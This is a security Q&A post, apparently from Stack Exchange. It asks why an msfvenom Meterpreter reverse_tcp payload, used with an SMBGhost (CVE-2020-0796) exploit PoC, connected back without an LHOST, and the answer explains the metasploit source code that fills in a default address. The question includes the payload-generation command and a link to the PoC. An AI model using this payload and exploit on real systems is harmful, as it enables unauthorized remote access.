# Msfvenom reverse_tcp without LHOST

Tags: exploit, metasploit, smb, msfvenom

I have tested SMBGhost (CVE-2020-0796). I used the following `msfvenom` command to generate a reverse shell payload.

```
msfvenom - p windows/x64/meterpreter/reverse_tcp LPORT = 4444 - b '\x00' - i 1 - f python
```

As you can see, I did not include `LHOST` argument and the SMBGhost RCE attack worked perfectly. I got reverse shell without `LHOST`.

I really wonder how was it possible? I didn't include `LHOST` (which is the IP address of the attacker) on `msfvenom` command. But the reverse shell was connected from victim to attacker.

I used this POC for the RCE attack:

- https://github.com/chompie1337/SMBGhost_RCE_PoC

Comment: did you look up what the settings are? `show options`

Comment: @schroeder hello! settings for what?

Answer (score 1):

It's not well documented, but if you are running it from `bash`, `msfvenom` will check for an address to use as `LHOST` if you do not provide it in the command line. You have to dig into the source to see it. **Note:** This is unreliable and I would recommend explicitly setting `LHOST`, especially if your system has multiple interfaces.

Below is [the code from GitHub](https://github.com/rapid7/metasploit-framework/blob/master/msfvenom#L212-L220). Pay special attention to L219:

```
212  if args
213    args.each do |x|
214      k,v = x.split('=', 2)
215      datastore[k.upcase] = v.to_s
216    end
217    if opts[:payload].to_s =~ /[\_\/]reverse/ && datastore['LHOST'].nil?
218      init_framework
219      datastore['LHOST'] = Rex::Socket.source_address
220    end
```

As you can see, it checks the args for `LHOST=value` in L214 and assigns those in L215. In line 217, if the payload is a reverse payload and there is no `LHOST`, it will pass to L219 where [`Rex::Socket.source_address`](https://www.rubydoc.info/gems/rex/Rex/Socket#source_address-class_method) is called. This will essentially identify the best option for a source address.

I tested this on my Kali system and added a `puts` statement after L219 to display the value that is set when `LHOST` is empty. This displayed the value of `eth1` in the output of the debug statement I added.

```
  if args
    args.each do |x|
      k,v = x.split('=', 2)
      datastore[k.upcase] = v.to_s
    end
    if opts[:payload].to_s =~ /[\_\/]reverse/ && datastore['LHOST'].nil?
      init_framework
      datastore['LHOST'] = Rex::Socket.source_address
      $stdout.puts datastore['LHOST']    ## DEBUG LINE
    end
  end
```